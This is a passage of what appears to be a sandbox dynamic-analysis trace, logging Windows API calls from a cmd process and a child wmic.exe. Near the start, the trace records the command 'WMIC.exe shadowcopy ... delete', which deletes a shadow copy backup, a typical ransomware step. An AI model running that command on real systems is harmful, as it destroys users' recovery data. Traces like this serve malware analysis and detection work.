_wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0084.645] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0084.645] GetProcessHeap () returned 0x2d0000 [0084.645] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e46f0 | out: hHeap=0x2d0000) returned 1 [0084.645] GetProcessHeap () returned 0x2d0000 [0084.645] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e8a30 [0084.645] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0084.646] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x12edb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ed60 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete", lpProcessInformation=0x12ed60*(hProcess=0x54, hThread=0x50, dwProcessId=0x89c, dwThreadId=0x8ac)) returned 1 [0084.651] CloseHandle (hObject=0x50) returned 1 [0084.651] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0084.651] GetProcessHeap () returned 0x2d0000 [0084.651] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec360 | out: hHeap=0x2d0000) returned 1 [0084.651] GetEnvironmentStringsW () returned 0x2ead60* [0084.651] GetProcessHeap () returned 0x2d0000 [0084.651] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2eb850 [0084.651] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0084.651] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0089.589] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x12eca8 | out: lpExitCode=0x12eca8*=0x0) returned 1 [0089.589] CloseHandle (hObject=0x54) returned 1 [0089.589] _vsnwprintf (in: _Buffer=0x12ef18, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ecb8 | out: _Buffer="00000000") returned 8 [0089.589] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0089.589] GetProcessHeap () returned 0x2d0000 [0089.589] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb850 | out: hHeap=0x2d0000) returned 1 [0089.589] GetEnvironmentStringsW () returned 0x2ead60* [0089.589] GetProcessHeap () returned 0x2d0000 [0089.589] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eb880 [0089.589] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0089.589] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0089.589] GetProcessHeap () returned 0x2d0000 [0089.589] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb880 | out: hHeap=0x2d0000) returned 1 [0089.589] GetEnvironmentStringsW () returned 0x2ead60* [0089.589] GetProcessHeap () returned 0x2d0000 [0089.589] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eb880 [0089.589] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0089.589] GetProcessHeap () returned 0x2d0000 [0089.589] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8a30 | out: hHeap=0x2d0000) returned 1 [0089.589] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ed78 | out: lpAttributeList=0x12ed78) [0089.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.590] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0089.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.590] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a26e194 | out: lpMode=0x4a26e194) returned 1 [0089.590] _get_osfhandle (_FileHandle=0) returned 0x3 [0089.590] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a26e198 | out: lpMode=0x4a26e198) returned 1 [0089.590] SetConsoleInputExeNameW () returned 0x1 [0089.590] GetConsoleOutputCP () returned 0x1b5 [0089.590] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a27bfe0 | out: lpCPInfo=0x4a27bfe0) returned 1 [0089.590] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.590] exit (_Code=0) Process: id = "11" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x18bc6000" os_pid = "0x89c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x84c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 116 os_tid = 0x8ac [0084.707] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfdf0 | out: lpSystemTimeAsFileTime=0x1cfdf0*(dwLowDateTime=0x3a261950, dwHighDateTime=0x1d68245)) [0084.707] GetCurrentProcessId () returned 0x89c [0084.707] GetCurrentThreadId () returned 0x8ac [0084.707] GetTickCount () returned 0x114b00e [0084.707] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfdf8 | out: lpPerformanceCount=0x1cfdf8*=20460061061) returned 1 [0084.709] GetModuleHandleW (lpModuleName=0x0) returned 0xff100000 [0084.709] __set_app_type (_Type=0x1) [0084.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff14ced0) returned 0x0 [0084.709] __wgetmainargs (in: _Argc=0xff172380, _Argv=0xff172390, _Env=0xff172388, _DoWildCard=0, _StartInfo=0xff17239c | out: _Argc=0xff172380, _Argv=0xff172390, _Env=0xff172388) returned 0 [0084.709] ??0CHString@@QEAA@XZ () returned 0xff172ab0 [0084.710] malloc (_Size=0x30) returned 0x135a50 [0084.710] malloc (_Size=0x70) returned 0x135a90 [0084.710] malloc (_Size=0x50) returned 0x137d30 [0084.710] malloc (_Size=0x30) returned 0x137d90 [0084.710] malloc (_Size=0x48) returned 0x137dd0 [0084.710] malloc (_Size=0x30) returned 0x137e20 [0084.710] malloc (_Size=0x30) returned 0x137e60 [0084.710] ??0CHString@@QEAA@XZ () returned 0xff172f58 [0084.710] malloc (_Size=0x30) returned 0x137ea0 [0084.710] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0084.710] SetConsoleCtrlHandler (HandlerRoutine=0xff145724, Add=1) returned 1 [0084.710] _onexit (_Func=0xff15f378) returned 0xff15f378 [0084.710] _onexit (_Func=0xff15f490) returned 0xff15f490 [0084.710] _onexit (_Func=0xff15f4d0) returned 0xff15f4d0 [0084.710] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0084.710] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0084.713] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0084.743] CoCreateInstance (in: rclsid=0xff1073a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff107370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff172940 | out: ppv=0xff172940*=0x1df1390) returned 0x0 [0084.750] GetCurrentProcess () returned 0xffffffffffffffff [0084.750] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cfbc0 | out: TokenHandle=0x1cfbc0*=0xf4) returned 1 [0084.750] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cfbb8 | out: TokenInformation=0x0, ReturnLength=0x1cfbb8) returned 0 [0084.751] malloc (_Size=0x118) returned 0x1369a0 [0084.751] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x1369a0, TokenInformationLength=0x118, ReturnLength=0x1cfbb8 | out: TokenInformation=0x1369a0, ReturnLength=0x1cfbb8) returned 1 [0084.751] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x1369a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=624221873, Attributes=0x6683), (Luid.LowPart=0x0, Luid.HighPart=1277664, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0084.751] free (_Block=0x1369a0) [0084.751] CloseHandle (hObject=0xf4) returned 1 [0084.751] malloc (_Size=0x40) returned 0x137ee0 [0084.751] malloc (_Size=0x40) returned 0x137f30 [0084.751] malloc (_Size=0x40) returned 0x137f80 [0084.751] malloc (_Size=0x20a) returned 0x1369a0 [0084.751] GetSystemDirectoryW (in: lpBuffer=0x1369a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0084.751] free (_Block=0x1369a0) [0084.751] malloc (_Size=0x18) returned 0x1ddfb0 [0084.751] malloc (_Size=0x18) returned 0x1369a0 [0084.752] malloc (_Size=0x18) returned 0x1369c0 [0084.752] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0084.752] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0084.752] free (_Block=0x1ddfb0) [0084.752] free (_Block=0x1369a0) [0084.752] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0084.752] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0084.752] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0084.753] FreeLibrary (hLibModule=0x77940000) returned 1 [0084.753] free (_Block=0x1369c0) [0084.753] _vsnwprintf (in: _Buffer=0x137f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cf7e8 | out: _Buffer="ms_409") returned 6 [0084.753] malloc (_Size=0x20) returned 0x1369a0 [0084.754] GetComputerNameW (in: lpBuffer=0x1369a0, nSize=0x1cfbc0 | out: lpBuffer="XDUWTFONO", nSize=0x1cfbc0) returned 1 [0084.754] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.754] malloc (_Size=0x14) returned 0x1ddfb0 [0084.754] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.754] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cfbb8 | out: lpNameBuffer=0x0, nSize=0x1cfbb8) returned 0x7fffffde000 [0084.755] GetLastError () returned 0xea [0084.755] malloc (_Size=0x40) returned 0x1369d0 [0084.755] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1369d0, nSize=0x1cfbb8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cfbb8) returned 0x1 [0084.755] lstrlenW (lpString="") returned 0 [0084.755] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0084.756] lstrlenW (lpString=".") returned 1 [0084.756] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.756] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0084.756] lstrlenW (lpString="LOCALHOST") returned 9 [0084.756] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0084.757] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.757] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0084.757] free (_Block=0x1ddfb0) [0084.757] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.757] malloc (_Size=0x14) returned 0x1ddfb0 [0084.757] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.757] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.757] malloc (_Size=0x14) returned 0x136a20 [0084.757] lstrlenW (lpString="XDUWTFONO") returned 9 [0084.757] malloc (_Size=0x8) returned 0x136a40 [0084.757] malloc (_Size=0x18) returned 0x136a60 [0084.757] malloc (_Size=0x30) returned 0x136a80 [0084.757] malloc (_Size=0x18) returned 0x136ac0 [0084.757] SysStringLen (param_1="IDENTIFY") returned 0x8 [0084.757] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0084.757] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0084.757] SysStringLen (param_1="IDENTIFY") returned 0x8 [0084.758] malloc (_Size=0x30) returned 0x136ae0 [0084.758] malloc (_Size=0x18) returned 0x136b20 [0084.758] SysStringLen (param_1="IMPERSONATE") returned 0xb [0084.758] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0084.758] SysStringLen (param_1="IMPERSONATE") returned 0xb [0084.758] SysStringLen (param_1="IDENTIFY") returned 0x8 [0084.758] SysStringLen (param_1="IDENTIFY") returned 0x8 [0084.758] SysStringLen (param_1="IMPERSONATE") returned 0xb [0084.758] malloc (_Size=0x30) returned 0x136b40 [0084.758] malloc (_Size=0x18) returned 0x136b80 [0084.758] SysStringLen (param_1="DELEGATE") returned 0x8 [0084.758] SysStringLen (param_1="IDENTIFY") returned 0x8 [0084.758] SysStringLen (param_1="DELEGATE") returned 0x8 [0084.758] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0084.758] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0084.758] SysStringLen (param_1="DELEGATE") returned 0x8 [0084.758] malloc (_Size=0x30) returned 0x136ba0 [0084.758] malloc (_Size=0x18) returned 0x136be0 [0084.758] malloc (_Size=0x30) returned 0x136c00 [0084.758] malloc (_Size=0x18) returned 0x136c40 [0084.759] SysStringLen (param_1="NONE") returned 0x4 [0084.759] SysStringLen (param_1="DEFAULT") returned 0x7 [0084.759] SysStringLen (param_1="DEFAULT") returned 0x7 [0084.759] SysStringLen (param_1="NONE") returned 0x4 [0084.759] malloc (_Size=0x30) returned 0x136c60 [0084.759] malloc (_Size=0x18) returned 0x136ca0 [0084.759] SysStringLen (param_1="CONNECT") returned 0x7 [0084.759] SysStringLen (param_1="DEFAULT") returned 0x7 [0084.759] malloc (_Size=0x30) returned 0x136cc0 [0084.759] malloc (_Size=0x18) returned 0x136d00 [0084.759] SysStringLen (param_1="CALL") returned 0x4 [0084.759] SysStringLen (param_1="DEFAULT") returned 0x7 [0084.759] SysStringLen (param_1="CALL") returned 0x4 [0084.759] SysStringLen (param_1="CONNECT") returned 0x7 [0084.759] malloc (_Size=0x30) returned 0x136d20 [0084.759] malloc (_Size=0x18) returned 0x136d60 [0084.759] SysStringLen (param_1="PKT") returned 0x3 [0084.759] SysStringLen (param_1="DEFAULT") returned 0x7 [0084.759] SysStringLen (param_1="PKT") returned 0x3 [0084.759] SysStringLen (param_1="NONE") returned 0x4 [0084.759] SysStringLen (param_1="NONE") returned 0x4 [0084.760] SysStringLen (param_1="PKT") returned 0x3 [0084.760] malloc (_Size=0x30) returned 0x136d80 [0084.760] malloc (_Size=0x18) returned 0x136dc0 [0084.760] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0084.760] SysStringLen (param_1="DEFAULT") returned 0x7 [0084.760] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0084.760] SysStringLen (param_1="NONE") returned 0x4 [0084.760] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0084.760] SysStringLen (param_1="PKT") returned 0x3 [0084.760] SysStringLen (param_1="PKT") returned 0x3 [0084.760] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0084.760] malloc (_Size=0x30) returned 0x138000 [0084.761] malloc (_Size=0x18) returned 0x136de0 [0084.761] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0084.761] SysStringLen (param_1="DEFAULT") returned 0x7 [0084.762] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0084.762] SysStringLen (param_1="PKT") returned 0x3 [0084.762] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0084.762] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0084.762] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0084.762] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0084.762] malloc (_Size=0x30) returned 0x138040 [0084.762] malloc (_Size=0x40) returned 0x136e00 [0084.762] malloc (_Size=0x20a) returned 0x136e50 [0084.762] GetSystemDirectoryW (in: lpBuffer=0x136e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0084.762] free (_Block=0x136e50) [0084.762] malloc (_Size=0x18) returned 0x136e50 [0084.762] malloc (_Size=0x18) returned 0x136e70 [0084.762] malloc (_Size=0x18) returned 0x136e90 [0084.763] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0084.763] SysStringLen (param_1="\\wbem\\") returned 0x6 [0084.763] free (_Block=0x136e50) [0084.763] free (_Block=0x136e70) [0084.763] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0084.763] free (_Block=0x136e90) [0084.763] malloc (_Size=0x18) returned 0x136e50 [0084.763] malloc (_Size=0x18) returned 0x136e70 [0084.763] malloc (_Size=0x18) returned 0x136e90 [0084.763] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0084.763] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0084.764] free (_Block=0x136e50) [0084.764] free (_Block=0x136e70) [0084.764] GetCurrentThreadId () returned 0x8ac [0084.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf4c0 | out: phkResult=0x1cf4c0*=0xf8) returned 0x0 [0084.764] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf510, lpcbData=0x1cf4b0*=0x400 | out: lpType=0x0, lpData=0x1cf510*=0x30, lpcbData=0x1cf4b0*=0x4) returned 0x0 [0084.764] _wcsicmp (_String1="0", _String2="1") returned -1 [0084.764] _wcsicmp (_String1="0", _String2="2") returned -2 [0084.764] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf4b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf4b0*=0x42) returned 0x0 [0084.764] malloc (_Size=0x86) returned 0x136eb0 [0084.764] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x136eb0, lpcbData=0x1cf4b0*=0x42 | out: lpType=0x0, lpData=0x136eb0*=0x25, lpcbData=0x1cf4b0*=0x42) returned 0x0 [0084.764] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0084.764] malloc (_Size=0x42) returned 0x136f40 [0084.764] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0084.764] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf510, lpcbData=0x1cf4b0*=0x400 | out: lpType=0x0, lpData=0x1cf510*=0x36, lpcbData=0x1cf4b0*=0xc) returned 0x0 [0084.764] _wtol (_String="65536") returned 65536 [0084.765] free (_Block=0x136eb0) [0084.765] RegCloseKey (hKey=0x0) returned 0x6 [0084.765] CoCreateInstance (in: rclsid=0xff107410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1073f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cf9b8 | out: ppv=0x1cf9b8*=0x1d171d0) returned 0x0 [0084.786] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1d171d0, xmlSource=0x1cfb00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x136e50), isSuccessful=0x1cfb70 | out: isSuccessful=0x1cfb70*=0xffff) returned 0x0 [0084.912] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1d171d0, DOMElement=0x1cf9b0 | out: DOMElement=0x1cf9b0) returned 0x0 [0084.912] malloc (_Size=0x18) returned 0x136e50 [0084.912] free (_Block=0x136e50) [0084.912] malloc (_Size=0x18) returned 0x136e50 [0084.912] free (_Block=0x136e50) [0084.912] malloc (_Size=0x18) returned 0x136e50 [0084.913] malloc (_Size=0x18) returned 0x136e70 [0084.913] malloc (_Size=0x30) returned 0x138080 [0084.913] malloc (_Size=0x18) returned 0x136eb0 [0084.913] free (_Block=0x136eb0) [0084.913] malloc (_Size=0x18) returned 0x13c560 [0084.913] malloc (_Size=0x18) returned 0x13c580 [0084.913] SysStringLen (param_1="VALUE") returned 0x5 [0084.913] SysStringLen (param_1="TABLE") returned 0x5 [0084.913] SysStringLen (param_1="TABLE") returned 0x5 [0084.913] SysStringLen (param_1="VALUE") returned 0x5 [0084.913] malloc (_Size=0x30) returned 0x1380c0 [0084.914] malloc (_Size=0x18) returned 0x13c5a0 [0084.914] free (_Block=0x13c5a0) [0084.914] malloc (_Size=0x18) returned 0x13c5a0 [0084.914] malloc (_Size=0x18) returned 0x13c5c0 [0084.914] SysStringLen (param_1="LIST") returned 0x4 [0084.914] SysStringLen (param_1="TABLE") returned 0x5 [0084.914] malloc (_Size=0x30) returned 0x138100 [0084.914] malloc (_Size=0x18) returned 0x13c5e0 [0084.914] free (_Block=0x13c5e0) [0084.914] malloc (_Size=0x18) returned 0x13c5e0 [0084.915] malloc (_Size=0x18) returned 0x13c600 [0084.915] SysStringLen (param_1="RAWXML") returned 0x6 [0084.915] SysStringLen (param_1="TABLE") returned 0x5 [0084.915] SysStringLen (param_1="RAWXML") returned 0x6 [0084.915] SysStringLen (param_1="LIST") returned 0x4 [0084.915] SysStringLen (param_1="LIST") returned 0x4 [0084.915] SysStringLen (param_1="RAWXML") returned 0x6 [0084.915] malloc (_Size=0x30) returned 0x138140 [0084.915] malloc (_Size=0x18) returned 0x13c620 [0084.915] free (_Block=0x13c620) [0084.915] malloc (_Size=0x18) returned 0x13c620 [0084.915] malloc (_Size=0x18) returned 0x13c640 [0084.915] SysStringLen (param_1="HTABLE") returned 0x6 [0084.915] SysStringLen (param_1="TABLE") returned 0x5 [0084.915] SysStringLen (param_1="HTABLE") returned 0x6 [0084.915] SysStringLen (param_1="LIST") returned 0x4 [0084.915] malloc (_Size=0x30) returned 0x138180 [0084.916] malloc (_Size=0x18) returned 0x13c660 [0084.916] free (_Block=0x13c660) [0084.916] malloc (_Size=0x18) returned 0x13c660 [0084.916] malloc (_Size=0x18) returned 0x13c680 [0084.916] SysStringLen (param_1="HFORM") returned 0x5 [0084.916] SysStringLen (param_1="TABLE") returned 0x5 [0084.916] SysStringLen (param_1="HFORM") returned 0x5 [0084.916] SysStringLen (param_1="LIST") returned 0x4 [0084.916] SysStringLen (param_1="HFORM") returned 0x5 [0084.916] SysStringLen (param_1="HTABLE") returned 0x6 [0084.916] malloc (_Size=0x30) returned 0x1381c0 [0084.916] malloc (_Size=0x18) returned 0x13c6a0 [0084.916] free (_Block=0x13c6a0) [0084.916] malloc (_Size=0x18) returned 0x13c6a0 [0084.917] malloc (_Size=0x18) returned 0x13c6c0 [0084.917] SysStringLen (param_1="XML") returned 0x3 [0084.917] SysStringLen (param_1="TABLE") returned 0x5 [0084.917] SysStringLen (param_1="XML") returned 0x3 [0084.917] SysStringLen (param_1="VALUE") returned 0x5 [0084.917] SysStringLen (param_1="VALUE") returned 0x5 [0084.917] SysStringLen (param_1="XML") returned 0x3 [0084.917] malloc (_Size=0x30) returned 0x138200 [0084.917] malloc (_Size=0x18) returned 0x13c6e0 [0084.917] free (_Block=0x13c6e0) [0084.917] malloc (_Size=0x18) returned 0x13c6e0 [0084.917] malloc (_Size=0x18) returned 0x13c700 [0084.917] SysStringLen (param_1="MOF") returned 0x3 [0084.917] SysStringLen (param_1="TABLE") returned 0x5 [0084.917] SysStringLen (param_1="MOF") returned 0x3 [0084.917] SysStringLen (param_1="LIST") returned 0x4 [0084.917] SysStringLen (param_1="MOF") returned 0x3 [0084.917] SysStringLen (param_1="RAWXML") returned 0x6 [0084.917] SysStringLen (param_1="LIST") returned 0x4 [0084.917] SysStringLen (param_1="MOF") returned 0x3 [0084.917] malloc (_Size=0x30) returned 0x138240 [0084.918] malloc (_Size=0x18) returned 0x13c720 [0084.918] free (_Block=0x13c720) [0084.918] malloc (_Size=0x18) returned 0x13c720 [0084.918] malloc (_Size=0x18) returned 0x13c740 [0084.918] SysStringLen (param_1="CSV") returned 